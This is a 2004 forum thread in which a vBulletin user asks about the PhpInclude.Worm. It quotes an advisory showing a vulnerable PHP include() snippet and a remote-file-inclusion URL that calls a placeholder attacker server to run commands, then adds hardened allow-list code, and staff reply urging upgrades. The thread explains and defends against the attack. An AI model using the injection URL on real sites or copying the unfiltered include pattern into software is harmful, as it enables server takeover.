  #1  
Old 12-29-2004, 11:56 PM
Mouse Mouse is offline
 
Join Date: Aug 2003
Posts: 1
PHP worm?

I was informed by my host there is a PHP worm out there...do you have an update or is vBulletin already secure for it? I run version 2.3.0
This is a copy of the email I got. Any help would be appreciated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site, ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the following items:

include()
require()
mail()
upload

---------

From the article:

The new worm PhpInclude.Worm is currently propagating on the Internet; it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus products as being an alternative of Santy. We estimate that this worm is completely different from the Santy family; we thus decided to give it the generic alias "PhpInclude.Worm" ].

Contrary to Santy, PhpInclude.Worm does not exploit the phpBB vulnerabilities; it exploits a broader palette of faults known as "programming" faults. It seeks (via Google/Yahoo/AOL) Web servers whose PHP pages use the functions "include()" and "require()" in an unprotected way. How?

These functions are normally used by programmers in order to include Web pages specified in arguments. Unfortunately, not checking these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server:

Example: vulnerable.php
if(isset($page))
{
include($page);
}
-----------------------------------------------

The page above does not correctly filter the variable $page; it thus allows the inclusion and then the execution of distant arbitrary scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of IRC robots and the constitution of an army of zombie machines.

--
Reply With Quote
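
A hardened counterpart to the vulnerable.php pattern quoted in the post above, as an added example that is not part of the original thread or of vBulletin's code. The page names and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example: allow-list dispatch instead of include($page).
// The page keys, file names and the pages/ directory are hypothetical.

// Fixed map from public page names to local files. User input only
// selects a key; it never becomes part of a path or a URL.
const PAGES = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a requested page name to an absolute local file,
 * or return null if the request must be rejected.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (page[]=x) and any name not in the map are rejected outright,
    // which also rejects every http:// or ../ value.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET rather than relying on
// register_globals to create $page from the query string.
$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');

if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Independently of the code, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops include() and require() from fetching remote URLs, and register_globals, which let a query string create `$page` directly, was removed in PHP 5.4.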
  #2  
Old 12-30-2004, 02:02 AM
Steve Machol Steve Machol is offline
 
Join Date: Nov 2001
Posts: 1,896

Please read this important announcement about a security issue with your version of vB:

http://www.vbulletin.com/forum/showt...180#post694180

It is not related to the PHP worm, but this does need to be patched. I strongly recommend upgrading to at least 2.3.5 ASAP.

Please read this announcement concerning the phpBB worm and your vBulletin forums:

http://www.vbulletin.com/forum/showthread.php?t=124008
Reply With Quote
  #3  
Old 12-31-2004, 10:34 PM
boo.3 boo.3 is offline
 
Join Date: Nov 2004
Posts: 232

I don't understand why you don't just upgrade to 3.0.3?
Reply With Quote